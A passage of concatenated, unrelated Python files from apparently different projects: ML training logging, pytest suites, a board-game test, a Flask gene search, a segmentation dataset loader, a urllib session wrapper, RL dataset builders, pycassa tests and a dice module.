label="train_loss" ) plt.plot( np.arange(0, n_epochs), hist_train.history["val_loss"], label="val_loss" ) plt.plot( np.arange(0, n_epochs), hist_train.history["accuracy"], label="train_acc" ) plt.plot( np.arange(0, n_epochs), hist_train.history["val_accuracy"], label="val_acc" ) plt.title("Loss/Accuracy vs Epochs") plt.xlabel("No of Epochs") plt.ylabel("Loss/Accuracy") plt.legend() run.log_image("metrics plot", plot=plt) run.parent.log_image("metrics plot", plot=plt) # Pass model file to next step os.makedirs(step_output_path, exist_ok=True) model_output_path = os.path.join(step_output_path, model_name) model.save(model_output_path) if (autoencoder is None): autoencoder_and_history = train_autoencoder( x_train, x_train, autoencoder_n_epochs, autoencoder_batch_size ) autoencoder = autoencoder_and_history[0] hist_auto = autoencoder_and_history[1] test_loss = autoencoder_get_model_metrics( autoencoder, hist_auto, x_test ) run.log('autoencoder training loss', test_loss[0]) run.log('autoencoder test loss', test_loss[1]) run.parent.log('autoencoder training loss', test_loss[0]) run.parent.log('autoencoder test loss', test_loss[1]) plt.style.use("ggplot") plt.figure() plt.plot( np.arange(0, autoencoder_n_epochs), hist_auto.history["loss"], label="train_loss" ) plt.plot( np.arange(0, autoencoder_n_epochs), hist_auto.history["val_loss"], label="val_loss" ) plt.title("Loss/Accuracy vs Epochs") plt.xlabel("No of Epochs") plt.ylabel("Loss/Accuracy") plt.legend() run.log_image("metrics plot", plot=plt) run.parent.log_image("metrics plot", plot=plt) autencoder_output_path = os.path.join(step_output_path, autoencoder_name ) autoencoder.save(autencoder_output_path) print('autencoder saved') else: print('autencoder model already exists') # Also upload model file to run outputs for history os.makedirs('outputs', exist_ok=True) output_path = os.path.join('outputs', model_name) model.save(output_path) run.tag("run_type", value="train") print(f"tags now present for run: {run.tags}") run.complete() if __name__ == '__main__': main() # -*- coding: utf-8 -*- """ Tests for common elements found in _BaseVMCView """ import pytest # pylint: disable=import-error from vertical_multi_columns.views import EvenVMCView, _BaseVMC # Testing method pad_columns # What to test # The method "pad_columns" generates columns equal in length to the longest column # - all columns already equal # - all columns empty # - first column empty # - last column empty # - lots of columns def test_pad_columns_already_same(columns_same_length_4): """Ensure columns already the same length are not padded any further""" instance = _BaseVMC() columns, max_column = instance.pad_columns(columns_same_length_4) assert max_column == 4 for i in columns: assert (len(i)) == 4 def test_pad_first_column_empty(first_column_empty_5): """Ensure edge case where first column in empty is padded correctly""" instance = _BaseVMC() columns, max_column = instance.pad_columns(first_column_empty_5) assert max_column == 5 for i in columns: assert (len(i)) == 5 def test_pad_all_columns_empty(all_columns_empty): """Ensure edge case where all columns are empty can be handled""" instance = _BaseVMC() columns, max_column = instance.pad_columns(all_columns_empty) assert max_column == 0 for i in columns: assert (len(i)) == 0 def test_pad_last_column_empty(last_column_empty_2): """Ensure edge case where last column in empty is padded correctly""" instance = _BaseVMC() columns, max_column = instance.pad_columns(last_column_empty_2) assert max_column == 2 for i in columns: assert 
(len(i)) == 2 def test_pad_lots_of_columns(columns_many): """Ensure edge case where there are more columns than would be normally expected are handled correctly""" instance = _BaseVMC() columns, max_column = instance.pad_columns(columns_many(1000, 5000)) assert max_column == 1000 for i in columns: assert (len(i)) == 1000 # Testing method build_new_rows # What to test # The method "build_new_rows" generates a set of rows that correspond vertically to the passed columns # - number of rows corresponds to max_column value # - each row contains the number of elements specified by the setting number_of_columns # - values in rows are the same as the corresponding cell in columns # The next two tests are verifying the same thing. # I've included them for my own documentation. # They demonstrate using a parametrized fixture versus passing multiple fixtures with getfixturevalue() # NB ... In some cases, I'm instantiating EvenVMCView to get access to _BaseVMCView methods for testing since # that is the only way I can pass in number_of_columns def test_build_using_parametrized_fixture(padded_columns): """Ensure rows are built correctly. Using one method for parametrized fixtures.""" original_columns = padded_columns[0] out_column_length = padded_columns[1] num_cols = padded_columns[2] instance = EvenVMCView(num_columns=num_cols) # using EvenVMCView but for test, only interested in _BaseVMC rows = instance.build_new_rows(original_columns, out_column_length) assert len(rows) == out_column_length # number of rows corresponds to max length of the original columns for row in rows: assert ( len(row) == instance.number_of_columns ) # each row contains the number of elements specified by the setting number_of_columns # SUSAN - Rework this reversed_columns = [] for num in range(instance.number_of_columns): col = [rows[row][num] for row in range(out_column_length)] reversed_columns.append(col) assert reversed_columns == original_columns # when "unbuilt" the result should be identical to the original columns @pytest.mark.parametrize("padded_columns", [("fixture_padded_columns_4"), ("fixture_padded_columns_16")]) def test_build_using_getfixturevalue(padded_columns, request): """Ensure rows are built correctly. This is the same test as above using a different method of parametrizing fixtures""" padded_columns = request.getfixturevalue(padded_columns) original_columns = padded_columns[0] out_column_length = padded_columns[1] num_cols = padded_columns[2] instance = EvenVMCView(num_columns=num_cols) # using EvenVMCView but for test, only interested in _BaseVMC rows = instance.build_new_rows(original_columns, out_column_length) assert len(rows) == out_column_length # number of rows corresponds to max length of the original columns for row in rows: assert ( len(row) == instance.number_of_columns ) # each row contains the number of elements specified by the setting number_of_columns reversed_columns = [] for num in range(instance.number_of_columns): col = [rows[row][num] for row in range(out_column_length)] reversed_columns.append(col) assert reversed_columns == original_columns # when "unbuilt" the result should be identical to the original columns # Import smtplib for the actual sending function import smtplib # Import the email modules we'll need from email.mime.text import MIMEText # Variables template = "templates/hello_world.html" me = "" you = "" # Open a plain text file for reading. For this example, assume that # the text file contains only ASCII characters. 
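# NB: on Python 3, MIMEText() expects a text string, so either open the
# template in text mode ("r") or decode the bytes first, e.g.
# MIMEText(fp.read().decode("ascii")); the binary-mode open below only
# works as-is on Python 2.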
fp = open(template, "rb") # Create a text/plain message msg = MIMEText(fp.read()) fp.close() # me == the sender's email address # you == the recipient's email address msg["Subject"] = "The contents of templates/hello_world.html" msg["From"] = me msg["To"] = you # Send the message via our own SMTP server, but don't include the # envelope header. s = smtplib.SMTP("localhost") s.sendmail(me, you, msg.as_string()) s.quit() from part1 import ( gamma_board, gamma_busy_fields, gamma_delete, gamma_free_fields, gamma_golden_move, gamma_golden_possible, gamma_move, gamma_new, ) """ scenario: test_random_actions uuid: 694912875 """ """ random actions, total chaos """ board = gamma_new(4, 4, 3, 7) assert board is not None assert gamma_move(board, 1, 3, 2) == 1 assert gamma_move(board, 1, 0, 3) == 1 assert gamma_move(board, 2, 2, 2) == 1 assert gamma_golden_possible(board, 2) == 1 assert gamma_move(board, 1, 3, 3) == 1 assert gamma_move(board, 1, 0, 0) == 1 board883444428 = gamma_board(board) assert board883444428 is not None assert board883444428 == ("1..1\n" "..21\n" "....\n" "1...\n") del board883444428 board883444428 = None assert gamma_move(board, 2, 0, 2) == 1 assert gamma_move(board, 2, 1, 2) == 1 assert gamma_move(board, 3, 0, 2) == 0 board488204880 = gamma_board(board) assert board488204880 is not None assert board488204880 == ("1..1\n" "2221\n" "....\n" "1...\n") del board488204880 board488204880 = None assert gamma_move(board, 1, 1, 1) == 1 assert gamma_free_fields(board, 1) == 8 board100631094 = gamma_board(board) assert board100631094 is not None assert board100631094 == ("1..1\n" "2221\n" ".1..\n" "1...\n") del board100631094 board100631094 = None assert gamma_move(board, 2, 2, 3) == 1 assert gamma_move(board, 2, 2, 1) == 1 assert gamma_move(board, 3, 0, 3) == 0 assert gamma_move(board, 1, 2, 0) == 1 assert gamma_move(board, 2, 0, 3) == 0 assert gamma_move(board, 3, 0, 1) == 1 assert gamma_move(board, 3, 0, 3) == 0 assert gamma_move(board, 1, 0, 3) == 0 assert gamma_move(board, 2, 0, 3) == 0 assert gamma_move(board, 2, 2, 2) == 0 assert gamma_golden_possible(board, 2) == 1 assert gamma_move(board, 3, 3, 1) == 1 assert gamma_move(board, 3, 2, 0) == 0 assert gamma_free_fields(board, 3) == 3 assert gamma_move(board, 1, 1, 1) == 0 assert gamma_move(board, 1, 2, 2) == 0 assert gamma_move(board, 2, 0, 3) == 0 assert gamma_move(board, 3, 2, 3) == 0 assert gamma_move(board, 1, 0, 3) == 0 assert gamma_move(board, 2, 3, 1) == 0 assert gamma_move(board, 3, 3, 2) == 0 assert gamma_golden_possible(board, 3) == 1 assert gamma_move(board, 1, 1, 1) == 0 assert gamma_move(board, 1, 3, 2) == 0 assert gamma_move(board, 2, 3, 1) == 0 assert gamma_busy_fields(board, 2) == 5 assert gamma_free_fields(board, 2) == 3 assert gamma_move(board, 3, 2, 3) == 0 assert gamma_move(board, 1, 0, 3) == 0 assert gamma_move(board, 1, 0, 2) == 0 assert gamma_move(board, 2, 0, 1) == 0 assert gamma_move(board, 3, 3, 1) == 0 assert gamma_move(board, 2, 2, 3) == 0 assert gamma_move(board, 3, 1, 3) == 1 assert gamma_move(board, 1, 0, 1) == 0 assert gamma_free_fields(board, 1) == 2 assert gamma_move(board, 2, 0, 3) == 0 assert gamma_golden_possible(board, 2) == 1 gamma_delete(board) from flask import request, Blueprint from caendr.models.sql import Homolog, WormbaseGeneSummary from sqlalchemy import or_, func from logzero import logger def get_gene(query: str): """Lookup a single gene Lookup gene in the wormbase summary gene table. Args: query (str): Query string Returns: result (dict): List of dictionaries describing the homolog. 
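        Example (hypothetical): ``get_gene('pot-2')`` looks the gene up by locus,
        sequence name, or gene ID and returns the first matching row (or ``None``).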
""" query = request.args.get('query') or query query = str(query).lower() # First identify exact match result = WormbaseGeneSummary.query.filter(or_(func.lower(WormbaseGeneSummary.locus) == query, func.lower(WormbaseGeneSummary.sequence_name) == query, func.lower(WormbaseGeneSummary.gene_id) == query)) \ .first() if not result: result = WormbaseGeneSummary.query.filter(or_(func.lower(WormbaseGeneSummary.locus).startswith(query), func.lower(WormbaseGeneSummary.sequence_name).startswith(query), func.lower(WormbaseGeneSummary.gene_id).startswith(query))) \ .first() return result def search_genes(query: str): """Query gene Query genes in the wormbase summary gene table. Args: query (str): Query string Returns: results (list): List of dictionaries with gene results. """ results = WormbaseGeneSummary.query.filter(or_(func.lower(WormbaseGeneSummary.locus).startswith(query), func.lower(WormbaseGeneSummary.sequence_name).startswith(query), func.lower(WormbaseGeneSummary.gene_id).startswith(query))) \ .limit(10) \ .all() results = [x.to_json() for x in results] return results def search_homologs(query: str): """Query homolog Query the homologs database and return C. elegans homologs. Args: query (str): Query string Returns: results (list): List of dictionaries describing the homolog. """ query = request.args.get('query') or query query = query.lower() results = Homolog.query.filter((func.lower(Homolog.homolog_gene)).startswith(query)) \ .limit(10) \ .all() results = [x.unnest().to_json() for x in results] return results def combined_search(query: str): """Combines homolog and gene searches Args: query (str): Query string Returns: results (list): List of dictionaries describing the homolog. """ return (search_genes(query) + search_homologs(query))[0:10] def gene_variants(query: str): """Return a list of variants within a gene. 
Args: query: gene name or ID Returns: results (list): List of variants within a gene """ gene_record = get_gene(query) gene_variants = variant_query(gene_record.interval) #for row in gene_variants: # Filter ANN for annotations for gene # row['ANN'] = [x for x in row['ANN'] if gene_record.gene_id == x['gene_id']] return gene_variants def search_interval(gene: str): result = get_gene(gene) if result: return {'result': [ {"chromosome": result.chrom, 'start': result.start, 'end': result.end} ] } else: return {'error': 'not found'}dataset.py import os import torch.utils.data as data import torchvision.transforms as transforms import numpy as np from PIL import Image from imutils import paths def normalize(x): """Scale image to range 0..1 for correct plot""" x_max = np.percentile(x, 98) x_min = np.percentile(x, 2) if x_max == x_min: x = x/255.0 else: x = (x - x_min) / (x_max - x_min) x = x.clip(0, 1) return x def get_key(my_dict,val): for key, value in my_dict.items(): if (val == value).all(): return key return 'None' def read_lines_txt(dir='D:\\GIT\\00Dataset\\Segmentation\\camvid\\label_digit.txt'): return open(dir,'r').readlines() def save_dict2txt(dict,dir="dict.txt"): f = open(dir,"w") for key in dict: f.write("%s %d\n"%(key, dict[key])) f.close() def dataset_mask_processing(dir = 'D:\\GIT\\00Dataset\\Segmentation\\camvid\\LabeledApproved_full',color_list = 'D:\\GIT\\00Dataset\\Segmentation\\camvid\\label_colors.txt',label_digit_dir='D:\\GIT\\00Dataset\\Segmentation\\camvid\\label_digit.txt'): save_folder = dir+'_masks' if not os.path.exists(save_folder): os.mkdir(save_folder) lines = read_lines_txt(color_list) label_colors = {} for line in lines: items = line.split(' ') label = items[-1].replace('\n','') rgb = [int(x) for x in items[:-1]] if not len(rgb)==3: print('error') label_colors[label]=rgb mask_paths = list(paths.list_images(dir)) labels = list(label_colors.keys()) label_digit = {labels[i]:i for i in range(0,len(labels))} label_digit.update({'None':len(labels)}) save_dict2txt(label_digit,label_digit_dir) print('label digit ',label_digit) idx = 0 for p in mask_paths: fn = '_'.join(p.split(os.path.sep)[-1].split('.')[0].split('_')[:-1]) + '.png' if not os.path.isfile(os.path.join(save_folder,fn)): mask = np.array(Image.open(p)) h,w,c = mask.shape mask_label = np.zeros((h*w,1)).astype(np.uint8) mask = mask.reshape(h*w,c) for i in range(h*w): rgb = mask[i,:] key = get_key(label_colors,rgb) value = label_digit[key] mask_label[i] = value mask_label = mask_label.reshape(h,w) mask_label = Image.fromarray(mask_label) mask_label.save(os.path.join(save_folder,fn)) if idx%50 == 0: print('%d image processed.....'%idx) idx += 1 class Resize(object): def __init__(self, size): self.size = size def __call__(self, sample): img, mask = sample['image'], sample['mask'] img, mask = img.resize((self.size, self.size), resample=Image.BILINEAR), mask.resize((self.size, self.size), resample=Image.BILINEAR) return {'image': img, 'mask': mask} class RandomCrop(object): def __init__(self, size): self.size = size def __call__(self, sample): img, mask = sample['image'], sample['mask'] img, mask = img.resize((256, 256), resample=Image.BILINEAR), mask.resize((256, 256), resample=Image.BILINEAR) h, w = img.size new_h, new_w = self.size, self.size top = np.random.randint(0, h - new_h) left = np.random.randint(0, w - new_w) img = img.crop((left, top, left + new_w, top + new_h)) mask = mask.crop((left, top, left + new_w, top + new_h)) return {'image': img, 'mask': mask} class ColorJitter(object): def __init__(self, 
prob): self.prob = prob self.colorJitter = transforms.ColorJitter(0.1,0.1,0.1) def __call__(self, sample): if np.random.random_sample() < self.prob: img, mask = sample['image'], sample['mask'] img = self.colorJitter(img) return {'image': img, 'mask': mask} else: return sample class RandomFlip(object): def __init__(self, prob): self.prob = prob self.flip = transforms.RandomHorizontalFlip(1.) def __call__(self, sample): if np.random.random_sample() < self.prob: img, mask = sample['image'], sample['mask'] img = self.flip(img) mask = self.flip(mask) return {'image': img, 'mask': mask} else: return sample class ToTensor(object): def __init__(self): self.tensor = transforms.ToTensor() def __call__(self, sample): img, mask = sample['image'], sample['mask'] img, mask = self.tensor(img), self.tensor(mask) return {'image': img, 'mask': mask} #inputs and masks have the same names class PairDataset(data.Dataset): lines = read_lines_txt('D:\\GIT\\00Dataset\\Segmentation\\camvid\\label_digit.txt') CLASSES = [line.split(' ')[0].lower() for line in lines] print('CLASSES ',CLASSES) ''' CLASSES = ['sky', 'building', 'pole', 'road', 'pavement', 'tree', 'signsymbol', 'fence', 'car', 'pedestrian', 'bicyclist', 'unlabelled'] ''' def __init__(self, root_dir, images_dir,masks_dir,train=True,camvid=False, data_augmentation=True,classes=['building','tree','signsymbol','wall']):#classes=['building', 'tree','signsymbol'] self.root_dir = root_dir self.train = train self.image_list = sorted(os.listdir(os.path.join(root_dir, images_dir))) self.mask_list = sorted(os.listdir(os.path.join(root_dir, masks_dir))) self.transform = transforms.Compose( [RandomFlip(0.5), RandomCrop(224), ColorJitter(0.5), ToTensor()]) if not (train and data_augmentation): self.transform = transforms.Compose([Resize(224), ToTensor()]) self.root_dir = root_dir self.images_dir = images_dir self.masks_dir = masks_dir self.data_augmentation = data_augmentation self.class_values = [self.CLASSES.index(cls.lower()) for cls in classes] self.camvid = camvid def __len__(self): return len(self.image_list) def __getitem__(self, item): img_name = os.path.join(self.root_dir, self.images_dir, self.image_list[item]) mask_name = os.path.join(self.root_dir, self.masks_dir, self.mask_list[item]) img = Image.open(img_name) mask = Image.open(mask_name) img = img.convert('RGB') mask = mask.convert('L') if self.camvid: masks = [(np.asarray(mask) == v) for v in self.class_values] mask = np.stack(masks, axis=-1) mask = mask.sum(axis=-1) mask = Image.fromarray(np.uint8(mask * 255) , 'L') sample = {'image': img, 'mask': mask} sample = self.transform(sample) return sample class CustomDataset(data.Dataset): def __init__(self, root_dir): self.image_list = sorted(os.listdir(root_dir)) self.transform = transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor()]) self.root_dir = root_dir def __len__(self): return len(self.image_list) def __getitem__(self, item): img_name = '{}/{}'.format(self.root_dir, self.image_list[item]) img = Image.open(img_name) sample = img.convert('RGB') sample = self.transform(sample) return sample if __name__ == "__main__": dataset_mask_processing()core/session.py # -*- coding:utf-8 -*- """ 用于实现请求 """ import sys import time import inspect from urllib import request from concurrent.futures import ThreadPoolExecutor from concurrent.futures import ProcessPoolExecutor from concurrent import futures class SessionImpl(object): """ """ K_PROXY_HANDLER = 1 # 代理 K_COOKIE_HANDLER = 2 # 缓存 K_AUTH_HANDLER = 3 # 账号验证(代理的依然是1) K_REDIRECT_HANDLER = 4 # 
redirect

    def __init__(self, **kwargs):
        # Keep track of the currently cached handlers
        self.__cache_handlers = {}

    def _create_proxy_handler(self, key, proxy_url):
        """Create a proxy handler.

        @param key: "http" or "https"
        @param proxy_url: "ip:port" or "http://ip:port" or "user:password@ip:port"
        """
        proxy_cfg = {}
        proxy_cfg[key] = proxy_url
        proxy_handler = request.ProxyHandler(proxy_cfg)
        self.__cache_handlers[SessionImpl.K_PROXY_HANDLER] = proxy_handler

    def _create_cookie_handler(self, cookiejar=None):
        """Create a cookie handler.

        @param cookiejar: defaults to http.cookiejar.CookieJar
        """
        cookie_header = request.HTTPCookieProcessor(cookiejar)
        self.__cache_handlers[SessionImpl.K_COOKIE_HANDLER] = cookie_header

    def _create_auth_handler(self, passwdmgr, is_proxy=False):
        """Create a handler that carries client authentication.

        @param passwdmgr: an HTTPPasswordMgrWithDefaultRealm object
        @param is_proxy: whether this is for a proxy
        """
        if is_proxy:
            proxy_handler = request.ProxyBasicAuthHandler(passwdmgr)
            self.__cache_handlers[SessionImpl.K_PROXY_HANDLER] = proxy_handler
        else:
            auth_handler = request.HTTPBasicAuthHandler(passwdmgr)
            self.__cache_handlers[SessionImpl.K_AUTH_HANDLER] = auth_handler

    def _create_redirect_handler(self):
        """Create a handler that supports redirects."""
        redirect_handler = request.HTTPRedirectHandler()
        self.__cache_handlers[SessionImpl.K_REDIRECT_HANDLER] = redirect_handler

    def _create_passwd_mgr(self, user, passwd, url):
        """Create a password manager object.

        @param user: account name
        @param passwd: password
        @param url: URL
        """
        passwdmgr = request.HTTPPasswordMgrWithDefaultRealm()
        passwdmgr.add_password(None, url, user, passwd)
        return passwdmgr

    def open_proxy(self, key, url):
        """Enable the proxy settings."""
        self._create_proxy_handler(key, url)

    def open_proxy_auth(self, url, user, passwd):
        """Enable the proxy settings with a username and password."""
        passwdmgr = self._create_passwd_mgr(user, passwd, url)
        self._create_auth_handler(passwdmgr, is_proxy=True)

    def open_cookices(self, cookiejar=None):
        """Enable cookie handling."""
        self._create_cookie_handler(cookiejar)

    def open_http_auth(self, url, user, passwd):
        """Enable HTTP client authentication."""
        passwdmgr = self._create_passwd_mgr(user, passwd, url)
        self._create_auth_handler(passwdmgr)

    def open_redirect(self):
        """Enable redirect handling."""
        self._create_redirect_handler()

    def _open(self, req, timeout=30, opener=None):
        """Internal open helper; not meant to be called from outside."""
        if opener is None:
            opener = self.build_opener()
        return opener.open(req, timeout=timeout)

    def build_opener(self):
        """Build an opener from the cached handlers."""
        return request.build_opener(*list(self.__cache_handlers.values()))


class Session(SessionImpl):

    def __init__(self):
        super(Session, self).__init__()
        self.__cache_headers = {}
        self.__cache_data = None
        self.__cache_opener = None

    def set_cookie(self, key, value):
        pass

    def set_header(self, key, value):
        """Set a request header."""
        self.__cache_headers[key] = value

    def get(self, url, timeout=30, use_cache_opener=False):
        """Perform a GET request."""
        if not use_cache_opener or self.__cache_opener is None:
            self.__cache_opener = self.build_opener()
        req = request.Request(url, data=self.__cache_data, headers=self.__cache_headers, method="GET")
        return self._open(req, timeout, opener=self.__cache_opener)

    def post(self, url, timeout=30, use_cache_opener=False):
        """Perform a POST request."""
        if not use_cache_opener or self.__cache_opener is None:
            self.__cache_opener = self.build_opener()
        req = request.Request(url, data=self.__cache_data, headers=self.__cache_headers, method="POST")
        return self._open(req, timeout, opener=self.__cache_opener)


class SessionRunable:
    """Wrapper class for running Session work in threads or processes."""

    def __init__(self):
        pass

    def run(self, **kwargs):
        pass

    def exception(self, e):
        pass


def _run_thread_impl(runable_cls, **kwargs):
    """Thread execution wrapper."""
    # Create the runable object first
    runable_obj = runable_cls()
    try:
        # Run it
        runable_obj.run(**kwargs)
    except Exception as e:
        # Report the exception back
runable_obj.exception(e) def _run_process_impl(run_cls_name, run_cls_module, **kwargs): """ 进程执行包装,由于进程启动不能像线程那样可以传递对象 """ try: # 非专业实现... # 先根据模块名找到对应的模块 # 然后根据类名获取类 # 最后创建类对象 runable_module = sys.modules[run_cls_module] runable_cls = getattr(runable_module, run_cls_name) runable_obj = runable_cls() try: # 执行 runable_obj.run(**kwargs) except Exception as e: # 异常反馈 runable_obj.exception(e) except Exception as e: # 这个理论上没人看得到。。。 print("[process] error:{0}".format(e)) class SessionMgr: """ 支持多线程或者多进程执行Session请求的封装类 """ def __init__(self, runable_cls, num_of_pool, is_thread=True): """ @param runable_cls: 请求的包装类,用于实现外部控制 @param num_of_pool: 池的数量,线程or进程 @param is_thread: 默认为线程,False则使用进程 """ if not issubclass(runable_cls, SessionRunable): raise TypeError("runable_cls must be extends from SessionRunable") self.mSessionRunableCls = runable_cls self.mPoolObj = None self.mRunningFlag = False self.mIsThreadMode = is_thread if is_thread: self.mPoolObj = ThreadPoolExecutor(num_of_pool) else: self.mPoolObj = ProcessPoolExecutor(num_of_pool) def once(self, num, **kwargs): """ 单次执行 @param num: 同时执行多少个,每个执行完就退出 @param kwargs: 外部传给执行类的参数 """ jobs = [] # 区分线程和进程的启动方式 if self.mIsThreadMode: _run_impl = _run_thread_impl _run_cls = self.mSessionRunableCls else: _run_impl = _run_process_impl _run_cls = self.mSessionRunableCls.__name__ _run_mod = self.mSessionRunableCls.__module__ for i in range(num): if self.mIsThreadMode: jobs.append(self.mPoolObj.submit(_run_impl, _run_cls, **kwargs)) else: jobs.append(self.mPoolObj.submit(_run_impl, _run_cls, _run_mod, **kwargs)) futures.wait(jobs) def loop(self, num, **kwargs): """ 循环执行 @param num: 同时执行num个,每个执行完继续执行 @param kwargs: 外部传给执行类的参数 """ self.mRunningFlag = True enable_task_num = num jobs = [] # 区分线程和进程的启动方式 if self.mIsThreadMode: _run_impl = _run_thread_impl _run_cls = self.mSessionRunableCls else: _run_impl = _run_process_impl _run_cls = self.mSessionRunableCls.__name__ _run_mod = self.mSessionRunableCls.__module__ while self.mRunningFlag: for i in range(enable_task_num): if self.mIsThreadMode: jobs.append(self.mPoolObj.submit(_run_impl, _run_cls, **kwargs)) else: jobs.append(self.mPoolObj.submit(_run_impl, _run_cls, _run_mod, **kwargs)) enable_task_num = 0 while self.mRunningFlag and enable_task_num == 0: temp_done_jobs = [] for job in jobs: if job.done(): enable_task_num += 1 temp_done_jobs.append(job) # 都没有完成就等待 if enable_task_num == 0: time.sleep(1) # 移除已完成的 for job in temp_done_jobs: jobs.remove(job) j0rd1smit/lighting-RL from typing import Callable, List, Optional, Tuple import gym from gym.vector import SyncVectorEnv from pytorch_lightning import Callback from lightning_rl.callbacks.EnvironmentEvaluationCallback import EnvironmentEvaluationCallback from lightning_rl.callbacks.OnlineDataCollectionCallback import OnlineDataCollectionCallback, PostProcessFunction from lightning_rl.dataset.OnlineDataModule import OnlineDataModule from lightning_rl.dataset.samplers.EntireBufferSampler import EntireBufferSampler from lightning_rl.dataset.samplers.UniformSampler import UniformSampler from lightning_rl.environmental.EnvironmentLoop import EnvironmentLoop from lightning_rl.storage.UniformReplayBuffer import UniformReplayBuffer from lightning_rl.types import FetchAgentInfo, Policy EnvBuilder = Callable[[], gym.Env] def on_policy_dataset( env_builder: EnvBuilder, select_online_actions: Policy, fetch_agent_info: Optional[FetchAgentInfo] = None, # batch batch_size: int = 4000, # online callback n_envs: int = 10, steps_per_epoch: int = 5000, # post processing 
post_process_function: Optional[PostProcessFunction] = None, ) -> Tuple[OnlineDataModule, List[Callback]]: buffer = UniformReplayBuffer(batch_size) samples_per_epoch = steps_per_epoch * batch_size sampler = EntireBufferSampler(buffer, samples_per_epoch) data_module = OnlineDataModule(buffer, batch_size, sampler=sampler, pin_memory=True, n_workers=0) online_env = _build_env(env_builder, n_envs) n_samples_per_step = batch_size env_loop = EnvironmentLoop(online_env, select_online_actions, fetch_agent_info=fetch_agent_info) online_step_callback = OnlineDataCollectionCallback( buffer, env_loop, n_samples_per_step=n_samples_per_step, n_populate_steps=0, post_process_function=post_process_function, clear_buffer_before_gather=True, ) return data_module, [online_step_callback] def _build_env(env_builder: EnvBuilder, n_envs: int) -> gym.Env: if n_envs > 1: return SyncVectorEnv([env_builder for _ in range(n_envs)]) else: return env_builder() def off_policy_dataset( env_builder: EnvBuilder, select_online_actions: Policy, fetch_agent_info: Optional[FetchAgentInfo] = None, # buffer capacity: int = 100_000, # batch batch_size: int = 32, # online callback n_envs: int = 1, steps_per_epoch: int = 5000, n_populate_steps: int = 10000, # post processing post_process_function: Optional[PostProcessFunction] = None, ) -> Tuple[OnlineDataModule, List[Callback]]: buffer = UniformReplayBuffer(capacity) samples_per_epoch = steps_per_epoch * batch_size sampler = UniformSampler(buffer, samples_per_epoch) data_module = OnlineDataModule(buffer, batch_size, sampler=sampler, pin_memory=True, n_workers=0) online_env = _build_env(env_builder, n_envs) n_samples_per_step = batch_size env_loop = EnvironmentLoop(online_env, select_online_actions, fetch_agent_info=fetch_agent_info) online_step_callback = OnlineDataCollectionCallback( buffer, env_loop, n_samples_per_step=n_samples_per_step, n_populate_steps=n_populate_steps, post_process_function=post_process_function, clear_buffer_before_gather=False, ) return data_module, [online_step_callback] def eval_callback( env_builder: EnvBuilder, select_actions: Policy, seed: Optional[int] = None, n_envs: int = 1, n_eval_episodes: int = 10, n_test_episodes: int = 100, to_eval: bool = False, logging_prefix: str = "Evaluation", mean_return_in_progress_bar: bool = True, ) -> EnvironmentEvaluationCallback: env = _build_env(env_builder, n_envs) env_loop = EnvironmentLoop(env, select_actions) return EnvironmentEvaluationCallback( env_loop, n_eval_episodes=n_eval_episodes, n_test_episodes=n_test_episodes, to_eval=to_eval, seed=seed, logging_prefix=logging_prefix, mean_return_in_progress_bar=mean_return_in_progress_bar, ) 1-10 import unittest from nose.tools import assert_raises, assert_equal, assert_true from pycassa import index, ColumnFamily, ConnectionPool,\ NotFoundException, SystemManager from pycassa.contrib.stubs import ColumnFamilyStub, ConnectionPoolStub, \ SystemManagerStub pool = cf = None pool_stub = cf_stub = None def setup_module(): global pool, cf, indexed_cf, pool_stub, indexed_cf_stub, cf_stub credentials = {'username': 'jsmith', 'password': ''} pool = ConnectionPool(keyspace='PycassaTestKeyspace', credentials=credentials, timeout=1.0) cf = ColumnFamily(pool, 'Standard1', dict_class=TestDict) indexed_cf = ColumnFamily(pool, 'Indexed1') pool_stub = ConnectionPoolStub(keyspace='PycassaTestKeyspace', credentials=credentials, timeout=1.0) cf_stub = ColumnFamilyStub(pool_stub, 'Standard1', dict_class=TestDict) indexed_cf_stub = ColumnFamilyStub(pool_stub, 'Indexed1') def 
teardown_module(): cf.truncate() cf_stub.truncate() indexed_cf.truncate() indexed_cf_stub.truncate() pool.dispose() class TestDict(dict): pass class TestColumnFamilyStub(unittest.TestCase): def setUp(self): pass def tearDown(self): for test_cf in (cf, cf_stub): for key, columns in test_cf.get_range(): test_cf.remove(key) def test_empty(self): key = 'TestColumnFamily.test_empty' for test_cf in (cf, cf_stub): assert_raises(NotFoundException, test_cf.get, key) assert_equal(len(test_cf.multiget([key])), 0) for key, columns in test_cf.get_range(): assert_equal(len(columns), 0) def test_insert_get(self): key = 'TestColumnFamily.test_insert_get' columns = {'1': 'val1', '2': 'val2'} for test_cf in (cf, cf_stub): assert_raises(NotFoundException, test_cf.get, key) ts = test_cf.insert(key, columns) assert_true(isinstance(ts, (int, long))) assert_equal(test_cf.get(key), columns) def test_insert_multiget(self): key1 = 'TestColumnFamily.test_insert_multiget1' columns1 = {'1': 'val1', '2': 'val2'} key2 = 'test_insert_multiget1' columns2 = {'3': 'val1', '4': 'val2'} missing_key = 'key3' for test_cf in (cf, cf_stub): test_cf.insert(key1, columns1) test_cf.insert(key2, columns2) rows = test_cf.multiget([key1, key2, missing_key]) assert_equal(len(rows), 2) assert_equal(rows[key1], columns1) assert_equal(rows[key2], columns2) assert_true(missing_key not in rows) def insert_insert_get_indexed_slices(self): columns = {'birthdate': 1L} keys = set() for i in range(1, 4): indexed_cf.insert('key%d' % i, columns) indexed_cf_stub.insert('key%d' % i, columns) keys.add('key%d' % i) expr = index.create_index_expression(column_name='birthdate', value=1L) clause = index.create_index_clause([expr]) for test_indexed_cf in (indexed_cf, indexed_cf_stub): count = 0 for key, cols in test_indexed_cf.get_indexed_slices(clause): assert_equal(cols, columns) assert key in keys count += 1 assert_equal(count, 3) def test_remove(self): key = 'TestColumnFamily.test_remove' for test_cf in (cf, cf_stub): columns = {'1': 'val1', '2': 'val2'} test_cf.insert(key, columns) # An empty list for columns shouldn't delete anything test_cf.remove(key, columns=[]) assert_equal(test_cf.get(key), columns) test_cf.remove(key, columns=['2']) del columns['2'] assert_equal(test_cf.get(key), {'1': 'val1'}) test_cf.remove(key) assert_raises(NotFoundException, test_cf.get, key) Wal100/dice_game #!/usr/bin/env python3 # -*- coding: utf-8 -*- """Example on a module rolling dices.""" # pylint: disable=W0603 import random FACES = 6 ROLLS_MADE = 0 def init(): """Roll a dice once and return the value.""" global ROLLS_MADE random.seed() ROLLS_MADE = 0 def roll(): """Roll a dice once and return the value.""" global ROLLS_MADE ROLLS_MADE += 1 return random.randint(1, FACES) def get_rolls_made(): """Get number of 